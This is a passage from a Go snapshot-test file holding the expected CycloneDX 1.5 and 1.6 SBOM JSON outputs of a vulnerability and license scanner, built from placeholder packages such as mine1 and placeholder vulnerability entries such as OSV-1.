"id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithMixedIssues/one_source_with_one_deprecated_package - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/deprecated-pkg@1.0.0", "type": "library", "name": "deprecated-pkg", "version": "1.0.0", "licenses": [], "purl": "pkg:npm/deprecated-pkg@1.0.0", "properties": [ { "name": "deprecated", "value": "true" } ] } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@5.9.0", "type": "library", "name": "mine2", "version": "5.9.0", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine2@5.9.0" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:composer/author3/mine3@0.4.1", "type": "library", "name": "author3/mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:composer/author3/mine3@0.4.1" }, { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:nuget/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:nuget/mine2@3.2.5" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:composer/author3/mine3@0.4.1", "type": "library", "name": "author3/mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:composer/author3/mine3@0.4.1" }, { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:nuget/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:nuget/mine2@3.2.5" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:composer/author3/mine3@0.4.1", "type": "library", "name": "author3/mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:composer/author3/mine3@0.4.1" }, { "bom-ref": "pkg:npm/mine1", "type": "library", "name": "mine1", "licenses": [], "purl": "pkg:npm/mine1" }, { "bom-ref": "pkg:nuget/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:nuget/mine2@3.2.5" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/multiple_sources_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/no_sources - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [ { "id": "OSV-1", "source": {} } ], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [ { "id": "OSV-1", "source": {} } ], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [ { "id": "OSV-1", "source": {} } ], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1", "type": "library", "name": "mine1", "licenses": [], "purl": "pkg:npm/mine1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine3@0.10.2-rc", "type": "library", "name": "mine3", "version": "0.10.2-rc", "licenses": [], "purl": "pkg:npm/mine3@0.10.2-rc" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [], "detail": "This vulnerability allows for some very scary stuff to happen - seriously, you'd not believe it!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [], "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@5.9.0", "type": "library", "name": "mine2", "version": "5.9.0", "licenses": [], "purl": "pkg:npm/mine2@5.9.0" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } }, { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "UNKNOWN" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" }, { "bom-ref": "pkg:nuget/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:nuget/mine1@1.3.5" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": 